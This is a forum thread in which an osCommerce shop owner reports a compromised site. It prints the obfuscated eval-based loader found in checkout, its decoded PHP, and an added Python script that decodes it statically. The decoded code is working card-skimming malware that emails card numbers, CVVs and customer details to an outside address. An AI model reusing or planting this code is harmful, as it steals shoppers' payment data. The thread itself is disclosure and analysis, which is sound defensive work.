osCommerce

The e-commerce.

Credit Card Number stealing inc_lib.php


graith


I found this code in checkout_confirmation.php

require(DIR_WS_INCLUDES . 'inc_lib.php');

which looks like this.

<?

function d($s,$k=''){if($k==''){for($i=0;$i<strlen($s);$i){$d.=chr(hexdec(substr($s,$i,2)));$i=(float)($i)+2;}return

$d;}else{$r='';$f=d('6261736536345f6465636f6465');$u=$f('Z3ppbmZsYXRl');$s=$u($f($s));for($i=0;$i<strlen($s);$i++){$c=substr($s,$i,1);$kc=substr($k,($i%strlen($k))-1,1);$c=chr(ord($c)-ord($kc));$r.=$c;}return

$r;}}eval(d("dVNbU9tGGP1fycDQMPBsxsbIRooviZs2CWkaYxNozEwK8SWE+qbVdXdlrbS7klZSAu3093WNwgMz6ZvmO+c7e86ZTwQ/VQkLEG2pqVY7Pv+wp+Xd339VS6OLWtPjqRU297NWtTc6Kam034OAMtCq/wM9u1U/aL3+V4VIsND0HOpW+uWK+XF89XnaNJbm6htzWXP2auex5tokX5V6e5o5vPgyumro0AxjBkCiGN3tTc1YCuokSaf2tqTOJqPJWK8v3VmamixbIO5lK21+vPVI1aFIgOBt5U1NBZfj4eVSgS7gmU7S2S0y799Kk1flI2XfGn8aXf914OqWaycFhPLw5UNITggFYsZ4GPn16+7mtuqmceehVTmBBIXWjQtEwZG1ROChDZQyioo4ug73+kpix4s5BALF3LK9BDvpUyWiOgp+7luIejaz9AYMxGqezgjU5p1yhQcIRa0TYIeIMNSsPVcVpdZoV5pNraO018qBxT2sdCsaIdAQnWMzZyHHOJkfZhZEvs9D+3vSABBvnYJHFqZaX89FEjCLLBVMTUTvjRVkkTBshes4lCGLdHDWRxFK5B8aRaQuUAwslN2AF7vPqmbhMc/JLtedFv0E0cOB/8jCDKr0MlJ8EOHMY8jSPTvZcLVXc+j80/DwYVeH58O/7wczM4+nA0P1+aljp86UudwsI78Utm/CzjFggrkRt1ypfgA/tKnt++qCoThzTW/WtuQZHljEZ7iWyeW0N9wpXuTFSX4qKTelbm7cW5jLCEPEkEtZvqS/IfOs8DAVK5DV57xFA/iGEoduWXcRC+eaVYUPQPs9PNUTvSv+S8zPgztIFu/bgTpQqSSc3/zwD8VYY7eVjR5DAzvbA0mcsuJ9bCHTHl1qdxyTL0uG9ve3N3YeLKf8W7V8RZc5EHfZbodNiAPqvIHWbchG2PUcWu9avXj+4nSPTubFpCGo4CVj+onggdvaj74Gp7asfnC8Gj5eGfrp+2tR3RBwqqqce/5niaEETRKKk69dkWzCcft7n8=",864930819));

?>

Decoding it turns it into this

if((isset($v) AND $v==0) OR (isset($t) AND $t==false)){die('');}$first_name = $_POST['cc_owner'];
$ccnum = $_POST['cc_number'];
$ccstart1 = $_POST['cc_start_month'];
$ccstart2 = $_POST['cc_start_year'];
$cvv2 = $_POST['cc_ccv'];
$exp1 = $_POST['cc_expires_month'];
$exp2 = $_POST['cc_expires_year'];
$issue = $_POST['cc_issue'];
$add = tep_address_format($order->billing['format_id'], $order->billing, 1, ' ', '---');
$phone = $order->customer['telephone'];
$email = $order->customer['email_address'];
$street = $order->customer['street_address'];
$city = $order->customer['city'];
$state = $order->customer['state'];
$zip = $order->customer['postcode'];
$ip = $_SERVER["REMOTE_ADDR"];

$msg = "Email: $email\nstreet: $street\ncity: $city\nState: $state\nzip: $zip\nPhone: $phone
Name: $first_name\nCcnumber: $ccnum\nExpdate: $exp1/$exp2\nCVV: $cvv2\nStart: $ccstart1/$ccstart1\nIssue: $issue
IP: $ip\nAddress: $add";

$to="[email protected]";

$subj = "HEY BABY";

$from ="From: [email protected]";

mail ($to, $subj, $msg, $from);

Its job is to email the credit card details to the email address [email protected] with subject HEY BABY

It'd be a great shame if he got 10,000 emails from [email protected] with that subject or if that email address was submitted to some obnoxious email feed.

I've no idea how the site was hacked. It's a version of CRE Loaded and the admin directory is password protected. Every file had its date and time stamp set to November 2007 so we can't trace exactly when it was done. We've turned off accepting credit card payment and we'll have to use a payment provider instead.

Graith
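
An added example, not part of the original post or thread: a static decoder for the d() wrapper shown above, so the argument passed to eval() can be read without running any of the PHP. It reimplements both branches of d() in Python; the function names, the regex and the sample payload are constructed for illustration.

```python
import base64
import re
import zlib

# Matches the loader's call shape: eval(d("<base64>",<numeric key>))
CALL_RE = re.compile(r'eval\s*\(\s*d\s*\(\s*"([A-Za-z0-9+/=]+)"\s*,\s*(\d+)\s*\)\s*\)')

def hex_decode(s: str) -> str:
    """d($s) with no key: each pair of hex digits becomes one character."""
    return bytes.fromhex(s).decode("latin-1")

def decode_payload(blob: str, key: str) -> str:
    """d($s, $k): base64_decode, gzinflate (raw deflate), then subtract key bytes."""
    data = zlib.decompress(base64.b64decode(blob), -15)
    k = key.encode("latin-1")
    out = bytearray()
    for i, c in enumerate(data):
        # PHP substr($k, ($i % strlen($k)) - 1, 1): offset -1 is the last character,
        # which Python's negative indexing reproduces.
        kc = k[(i % len(k)) - 1]
        out.append((c - kc) % 256)  # PHP chr() wraps modulo 256
    return out.decode("latin-1")

def extract_and_decode(php_source: str) -> list:
    """Find eval(d("...", key)) calls and return the decoded text without executing it."""
    return [decode_payload(b, k) for b, k in CALL_RE.findall(php_source)]

def encode_sample(plain: str, key: str) -> str:
    """Inverse transform, used only to build the constructed sample below."""
    k = key.encode("latin-1")
    shifted = bytes((c + k[(i % len(k)) - 1]) % 256 for i, c in enumerate(plain.encode("latin-1")))
    comp = zlib.compressobj(wbits=-15)
    return base64.b64encode(comp.compress(shifted) + comp.flush()).decode("ascii")

# Constructed sample: a harmless string wrapped the same way as the loader's argument.
SAMPLE_KEY = "864930819"
SAMPLE_PHP = '<? eval(d("%s",%s)); ?>' % (encode_sample("echo 'constructed sample';", SAMPLE_KEY), SAMPLE_KEY)

if __name__ == "__main__":
    print(hex_decode("6261736536345f6465636f6465"))  # name hidden in the hex string
    for text in extract_and_decode(SAMPLE_PHP):
        print(text)
```

Feeding the contents of a suspect include file to extract_and_decode() returns the hidden source as text, which can then be searched for calls such as mail() or references to $_POST card fields.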


Brian,

Unless your site was PCI DSS compliant, you should not have been accepting credit cards anyway. Ensure your site is V2.2 RC2a and has ALL of the security patches and suggested Security Contributions installed to avoid any future security breaches.

Chris
